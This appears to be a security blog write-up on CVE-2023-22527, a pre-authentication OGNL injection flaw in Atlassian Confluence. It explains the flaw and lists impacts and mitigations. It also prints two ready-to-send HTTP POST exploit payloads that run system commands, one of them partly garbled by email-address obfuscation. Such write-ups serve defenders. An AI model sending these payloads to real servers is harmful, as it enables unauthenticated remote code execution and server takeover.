Atlassian Confluence Pre-Auth RCE via OGNL Injection – CVE-2023-22527

Vendor Description:-

Confluence is a web-based corporate wiki created by Atlassian, an Australian software firm formed in 2002. Launched in 2004, it immediately became one of Atlassian’s key products, assisting teams in better document management and collaboration. Confluence evolved from a simple wiki to a comprehensive enterprise knowledge management platform that includes real-time editing, connectors, and customized workflows. Atlassian provides Confluence as both a cloud service and an on-premise Data Center edition, providing flexibility for various enterprises. Today, it is widely utilized across industries as part of Atlassian’s larger array of productivity and development tools.

What is an OGNL Injection Attack?

Object-Graph Navigation Language (OGNL) is a Java expression language that is widely used in frameworks and apps such as Apache Struts and Atlassian Confluence. OGNL provides a simple vocabulary for describing complicated actions on Java objects, allowing developers to easily access and edit attributes, launch methods, and navigate object relationships.

When programs fail to properly validate and sanitize user input before using it in OGNL expressions, a security risk known as OGNL injection can arise. OGNL injection attacks include adversaries inserting specially prepared strings containing OGNL expressions into user interfaces or input fields. When the application processes this input without adequate validation, the injected OGNL expressions are executed within the application context. This can cause a variety of security risks, including unauthorized access to sensitive data and remote code execution.

How does the Atlassian Confluence CVE-2023-22527 Exploit Work?

Atlassian Confluence’s CVE-2023-22527 vulnerability is an OGNL injection flaw that lets unauthenticated attackers to execute arbitrary commands remotely in a vulnerable Confluence instance. The vulnerability is caused by a Velocity template file entitled “text-inline.vm” [3]. This file enables adversaries to execute instructions via the expression “#request[‘.KEY_velocity.struts2.context’].internalGet(‘ognl’)”. An example payload sent via an HTTP POST request is provided below.

//Attacker-crafted POST request

POST /template/aui/text-inline.vm HTTP/1.1
Host: <vulnerable_Confluence_instance>
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7b%7d)%2b\u0027&x=(new freemarker.template.utility.Execute()).exec(%7b%22whoami%22%7d)

Impacts:-

• Allows remote attackers to run arbitrary system commands on the Confluence servers.
• Can result in complete server compromise, including reading or changing sensitive files.
• May allow for lateral mobility inside the internal network.
• Can be used to spread malware or ransomware.
• Exposes critical passwords or configuration data, jeopardizing overall enterprise security.

Mitigations:-

• Upgrade to the latest version.
• Restrict Confluence access to trusted internal networks and demand rigorous authentication.
• Disable or limit OGNL and other template-based expression assessments.
• Monitor server logs for strange POST requests and set up a Web Application Firewall (WAF).

POC

Simply send the following request to execute arbitrary commands inside a craft OGNL expression and receive the response:

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))